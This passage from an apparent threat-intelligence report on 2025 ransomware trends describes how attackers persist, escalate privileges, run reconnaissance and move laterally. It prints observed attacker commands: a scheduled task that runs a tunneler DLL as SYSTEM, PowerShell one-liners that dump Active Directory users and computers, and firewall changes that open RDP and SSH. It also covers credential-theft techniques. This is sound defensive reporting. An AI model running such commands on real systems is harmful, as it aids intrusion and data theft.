infections, a social engineering engagement on LinkedIn prompted a user to access a malicious website hosting a ZIP archive containing the BULLZLINK downloader. Once executed, it retrieved a dropper variant of SQUIDSLEEP with an embedded SQUIDGATE payload.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, multiple ransomware actors relied on remote monitoring and management tools (RMMs) for multiple phases of the attack lifecycle. We observed a variety of these legitimate tools abused in incidents, including ANYDESK, SCREENCONNECT, and SPLASHTOP (Table 2). </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an UNC2465 incident, several weeks after the initial intrusion, the threat actors installed the TERAMIND RMM alongside Time Doctor. Time Doctor is an employee monitoring tool, which is capable of taking screenshots and screen recordings of the system as well as track website and application usage.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors continued to reduce their reliance on BEACON in ransomware operations; we observed BEACON in around 2% of intrusions, a decrease from an already diminished 11% in 2024. However, multiple threat clusters used other post-exploitation frameworks like AdaptixC2 (ADAPTAGENT), Exploration C2 (EXPLORATIONC2), or MYTHIC.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an UNC2165 RANSOMHUB incident, the threat actors used COM hijacking as a persistence mechanism for MYTHIC. UNC2165 created MYTHIC in the "Temp" folder, renamed it to "msedge.dll," and modified the registry key for InprocServer32 to point to the MYTHIC payload.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors often used native Windows features to create services and register scheduled tasks to programmatically and recurrently execute malware, such as backdoors or tunnelers. For example, in a RHYSIDA incident, threat actors registered a scheduled task to run the LIONSHARE tunneler every 12 hours (Figure 7).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a TridentLocker-branded incident, the threat actors uploaded WAVECALL, a downloader implemented as a .NET assembly, to a victim server running CrushFTP. They modified the command-line instruction used for processing file previews, replacing the configured executable paths for ImageMagick and ExifTool utilities with the WAVECALL assembly, thereby executing it whenever a file preview operation was initiated. The actors later reverted this configuration and updated the command-line instruction to execute a Base64-encoded PowerShell script to deploy a follow-on payload.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>/Create /SC MINUTE /MO 720 /TN Reg /TR "C:\Windows\System32\rundll32.exe C:\windows\system32\config\red.dll Test" /ru system</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 7: Scheduled task for LIONSHARE</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">ANYDESK</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">ATERA</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">CHROMEREMOTEDESKTOP</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">DAMEWARE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">DWAGENT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">MESHAGENT</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">RUSTDESK</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">SCREENCONNECT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">SPLASHTOP</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">TERAMIND</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Legitimate remote access tools used to establish a foothold and maintain a presence</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Escalate Privileges</span></h4> <p><span style="vertical-align: baseline;">Gaining access to highly privileged accounts is a critical step for ransomware actors as it enables further stages of the attack, such as disabling AV software, deleting backups, and deploying ransomware across the network. Threat actors continue to rely on a variety of privilege escalation tools and techniques, including leveraging MIMIKATZ, dumping credentials stored by the Windows operating system, and abusing Active Directory (AD).</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed threat actors leverage MIMIKATZ in approximately 18% of ransomware intrusions in 2025, demonstrating a slight, but continued decline in its overall use in recent years dropping from use in 20% of all ransomware intrusions in 2024. Notably, we observed a decline in other publicly available privilege escalation and credential stealing tools as well; for example, we did not observe LAZAGNE in any ransomware intrusions in 2025, a reduction from 2% of intrusions in 2024, 4% in 2023, and 6% in 2022.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consistent with recent years, throughout 2025 threat actors used a myriad of techniques to target Windows authentication systems to gain access to privileged accounts.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed threat actors frequently attempting to obtain credentials stored by Windows systems by dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the Security Account Manager (SAM), SYSTEM, and SECURITY registry hives.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Other observed methods include Kerberoasting, modifying the registry to enable WDigest credentials caching, and the recovery of credentials via the Windows Data Protection API (DPAPI).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors routinely elevated privileges of compromised and actor-provisioned accounts by adding them to local and domain administrator groups and/or granting the accounts additional privileges such as SeRemoteInteractiveLogonRight, SeDebugPrivilege, SeLoadDriverPrivilege, and SeBackupPrivilege.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In some intrusions, threat actors abused AD roles to obtain elevated privileges through a variety of means, including DCSync replication and the misuse of AD Certificate Services (AD CS). In a MEDUSALOCKER.V2 incident, the threat actors executed the "Move-ADDirectoryServerOperationMasterRole" cmdlet to transfer Flexible Single Master Operation (FSMO) roles from the victim's AD domain controller to a suspected rogue domain controller.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple threat actors attempt to harvest credentials from various internal sources, including backup tools, browsers, password managers, and credentials stored in cleartext.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In approximately 10% of intrusions we observed threat actors targeting Veeam Backup &amp; Replication for credential harvesting, which is consistent with activity observed in 2024. Multiple threat actors used the publicly available Veeam-Get-Creds.ps1 script or custom PowerShell scripts to obtain credentials stored in the Veeam configuration database.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a handful of incidents, threat actors targeted Chromium-based browsers to obtain stored credentials. For example, in an UNC2165 RANSOMHUB incident, the threat actors executed inline PowerShell to retrieve and decrypt DPAPI-protected master encryption key from the Local State files of Google Chrome and Microsoft Edge allowing access to stored credentials within the browsers.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors accessed or attempted to access common password management tools, including KeePass, Bitwarden, and the Windows Credential Manager. During one UNC2465 intrusion involving AGENDA ransomware, the threat actor accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During a REDBIKE ransomware incident, the threat actor likely harvested a cleartext password from a SonicWall appliance, which was also shared with an admin account, granting the actor domain administrator privileges.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one ransomware incident targeting a victim's virtualized environment, the threat actor exploited CVE-2024-37085 to gain administrator access to an ESXi hypervisor.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Internal Reconnaissance</span></h4> <p><span style="vertical-align: baseline;">In 2025, the tactics leveraged for internal reconnaissance remained fairly consistent with recent years; threat actors continued to rely on native system utilities, PowerShell commands, and publicly available software.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors consistently used PowerShell to query Active Directory (AD) objects for running processes, network shares, and user group memberships. This activity ranged from using native cmdlets like Get-ADComputer and Get-ADUser to using script blocks to query other system data.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In several cases, threat actors used Get-ADComputer and Get-ADUser to export lists of AD objects to a separate file. For example, in an incident involving MEDUSALOCKER.V2, the threat actors queried specific user object properties, exported account identity, contact information, and organizational metadata (Figure 8). At the same incident, the threat actors executed a different command to query domain-joined computers, capturing properties such as the operating system (OS), IPv4 address, and last logon date (Figure 9).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In some instances, threat actors executed PowerShell script blocks that ran a multitude of commands at once. For example, in an INTERLOCK incident, the threat actors ran a condensed one-line script that performed user profiling—including identifying the current user's username, Security Identifier (SID), and group memberships—checked for a domain connection, and enumerated the Domain Admins group. Notably, the script included a jitter, or time delay, to create random pauses between command execution, likely in an attempt to evade detection against rapid-fire command execution.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors continued to rely heavily on internal Windows utilities in this phase of the attack lifecycle, including ipconfig, netstat, ping, and nltest, among others.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Publicly available reconnaissance utilities were used in numerous intrusions. These publicly available tools ranged from those specialized in probing networks, such as Advanced IP Scanner, Softperfect Network Scanner (NETSCAN), and Angry IP Scanner, to red-teaming tools like PowerSploit and IMPACKET. Notably, network reconnaissance utilities like Advanced IP Scanner, NETSCAN, and Angry IP Scanner were used in approximately 50% of intrusions, similar to their observed usage in 2023 and 2024.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We often saw threat actors accessing files and folders related to potentially sensitive information. In some cases, they appeared to search for backup scripts and password managers, while in other cases they were likely attempting to find sensitive files to exfiltrate in order to increase the pressure applied by data theft extortion.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a REDBIKE intrusion, the threat actors searched for keywords like "passport," "i9," and "cyber insurance." In addition to searching for personally identifiable information (PII) like passports and employment eligibility forms, it is plausible that the threat actors were also seeking to obtain the victim's cyber insurance policies to help them determine a negotiation strategy or maximum ransom amount to demand.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Several threat actors performed targeted internal reconnaissance for information about virtualized infrastructure within the victim environment, likely to facilitate ransomware deployment on these systems. In a REDBIKE incident, threat actors enumerated hypervisors by running the Get-VM cmdlet and accessed the internal VMware vSphere web portal.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADUser -filter * -properties Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | select Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | export-csv C:\Users\Public\Music\users.csv </code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 8: Get-ADUser HostCmd</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\users\public\music\AllWindows.csv -NoTypeInformation -Encoding UTF8</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 9: Get-ADComputer HostCmd</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Lateral Movement</span></h4> <p><span style="vertical-align: baseline;">Throughout 2025, actors extensively used common built-in protocols, including RDP, Server Message Block (SMB), and Secure Shell (SSH), combined with compromised credentials or attacker-created accounts for lateral movement. We also observed actors leveraging a variety of tools and utilities to tunnel and proxy traffic within victim environments.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In approximately 85% of intrusions, threat actors leveraged RDP with either compromised or attacker-created accounts for lateral movement.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Across a range of incidents we observed threat actors leveraging SMB for lateral movement to access network shares, stage payloads, and execute remote commands.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one SAFEPAY ransomware incident, the threat actor leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We also observed multiple actors leverage IMPACKET.SMBEXEC to execute remote commands. For example, in one intrusion leading to MEDUSALOCKER.V2 ransomware, the threat actor leveraged IMPACKET.SMBEXEC to run commands to create a new local administrator account on a remote host.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Across numerous incidents we observed various threat actors leverage common public utilities like PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We continued to observe frequent use of common Windows utilities like PsExec, Windows Remote Management (WinRM), and to a lesser extent Windows Management Instrumentation Command-line (WMIC), for remote execution and lateral movement.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a handful of intrusions, threat actors used PowerShell to establish interactive remote sessions via WinRM using the "Enter-PSSession" cmdlet.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an UNC5774 INTERLOCK ransomware incident, the threat actors used WinRM to establish a connection to a domain controller and execute remote commands, including using net.exe to reset the password of a user account.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During an UNC2465 incident, the threat actor moved laterally by using WMIC to execute a SMOKEDHAM payload on a remote host.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In numerous incidents, threat actors manipulated firewall rules in order to enable different types of traffic, such as RDP or SMB, to be allowed within the victim environment.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In one incident, UNC6021, a suspected FIN6 threat cluster, created a scheduled task that ran a netsh command to modify firewall rules to enable remote desktop access (Figure 10).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one UNC6276 intrusion, the threat actor disabled the firewall on an ESXi host before deploying SYSTEMBC.LINUX on the host.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In one incident the threat actor installed OpenSSH on a host and ran a PowerShell command to configure a new firewall rule to allow inbound traffic on port 22 (Figure 11).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an intrusion leading to the deployment of INC ransomware, the threat actor leveraged an attacker-created account to create new firewall policies that granted access to multiple additional subnets within the network.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors leveraged a variety of malicious and legitimate utilities to tunnel and proxy traffic within victim networks, including SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH. During one LOCKBIT.WARLOCK intrusions the threat actor leveraged CLOUDFLARED to tunnel an RDP connection between two hosts.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a minimal number of incidents, threat actors leveraged publicly available post-exploitation tools including METASPLOIT and AMNESIAC.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors often abused access to various management consoles for virtual systems to move laterally to virtual hosts. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In multiple instances, the threat actors appeared to leverage this access to enable SSH on ESXi hosts prior to establishing SSH connections for lateral movement. For example, in a FOULFOG.LINUX incident, threat actors leveraged access from the victim's VMware vSphere centralized management portal to enable SSH on a vm-host, created user root1, SSHed using the newly created user, and disabled firewall.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one incident the threat actor leveraged access to the victim's Nutanix Prism Central management tool along with a compromised account to move laterally to multiple additional systems. In the same incident, the threat actor also used the VMware web user interface to access numerous ESXi hosts.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a subset of intrusions we observed evidence of threat actors conducting bruteforce attacks to gain access to accounts on additional systems.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=No</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 10: netsh command to modify firewall rules to enable remote access</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell.exe -Command New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 11: PowerShell command to allow inbound SSH traffic</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Complete Mission</span></h4> <p><span style="vertical-align: baseline;">The following sections highlight observations from the complete mission phase of the attack lifecycle, covering ransomware deployment, data exfiltration, and anti-analysis and recovery techniques. Threat actors conducting ransomware attacks routinely conduct multifaceted extortion operations involving data theft as it provides additional leverage during negotiations. Threat actors also consistently engage in a diverse range of tactics to ensure the success of their operations and reduce the ability for victims to recover, including tampering with security software, deleting backups, and clearing logs. Notable trends in 2025 include the prevalence of REDBIKE ransomware, an increase in the percentage of incidents involving data theft extortion, and indications that the techniques used to target virtual systems may be maturing.</span></p> <h4><span style="vertical-align: baseline;">Ransomware Families</span></h4> <p><span style="vertical-align: baseline;">REDBIKE was the most prominent ransomware observed in 2025 Mandiant incident response investigations, followed by AGENDA and then INC ransomware (Figure 12). In 2024, REDBIKE was tied for the number one spot with LOCKBIT.BLACK and RANSOMHUB; however, in 2024 LOCKBIT experienced significant disruptive actions stemming from law enforcement actions and in 2025 RansomHub abruptly ceased operations. Throughout 2025 we also observed a handful of incidents involving newly identified ransomware, such as NINTHBEE and SILVERPINE, demonstrating that at least a subset of threat actors are developing and maintaining new ransomware families.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">REDBIKE was seen in almost 30% of 2025 ransomware incidents, surpassing previous highs for single ransomware families, including LOCKBIT and ALPHV reaching 17% each in 2023.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We continue to observe threat actors reusing existing ransomware families in seemingly unrelated operations conducted under different extortion brands.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While we have seen a significant decrease in LOCKBIT ransomware incidents since the legal actions taken against the RaaS in 2024, in 2025 we did observe a handful of LOCKBIT.WARLOCK incidents. The WarLock DLS emerged in July 2025 and has listed over 75 victims since. LOCKBIT.WARLOCK largely leverages the original LOCKBIT codebase; however, it uses different encryption algorithms, and refactors previously inlined operations into dedicated functions.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, we observed a handful of intrusions involving CONTI ransomware, though the CONTI RaaS was shut down in May 2022 following the leak of associated chat logs and the CONTI source code. For example, we observed CONTI deployed in a 2025 incident associated with the Gunra ransomware group; analysis of the ransomware payload identified it was heavily based on CONTI's source code, with slight variations in obfuscation.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed three different extortion brands leveraging INC ransomware in their operations: INC Ransom, Sinobi, and Lynx. The INC ransomware source code was advertised in an underground forum in May 2024 but the Lynx and INC Ransom DLS domains were acquired by a common threat actor.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">GTIG observed ODDSIDE ransomware in an incident in 2025; ODDSIDE is PowerShell-based ransomware that refers to itself as DARKMATTER. While not completely unheard of, PowerShell-based ransomware is fairly rare.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Notably, in one incident we observed threat actors deploy CLOP ransomware. This is the first time we’ve responded to a CLOP ransomware incident since 2020, though we have occasionally identified CLOP ransomware samples uploaded to malware repositories. In recent years, threat actors associated with the CL0P data leak site have primarily conducted data-theft-extortion-only operations rather than performing encryption.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a subset of incidents, we were unable to obtain the ransomware payloads. For example, we observed a handful of TridentLocker-branded ransomware incidents in which there is evidence to suggest that the ransomware payload was executed in memory. It's plausible the threat actors used in-memory execution to deploy ransomware to try and bypass security detections and potentially make analysis and recovery efforts more difficult.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors occasionally abuse legitimate encryption tools in their extortion operations. In 2025, we observed an incident in which threat actors used BitLocker to encrypt over 200 remote hosts.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig12.max-1000x1000.png" alt="Distribution of ransomware families observed in 2025 investigations"> </a> <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 12: Distribution of ransomware families observed in 2025 investigations</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td colspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">Ransomware Families Observed in 2025 Mandiant Investigations</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">AGENDA</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">AGENDA.ESXI</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">AGENDA.RUST</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">BABUK</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">BABUK.MARIO</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: 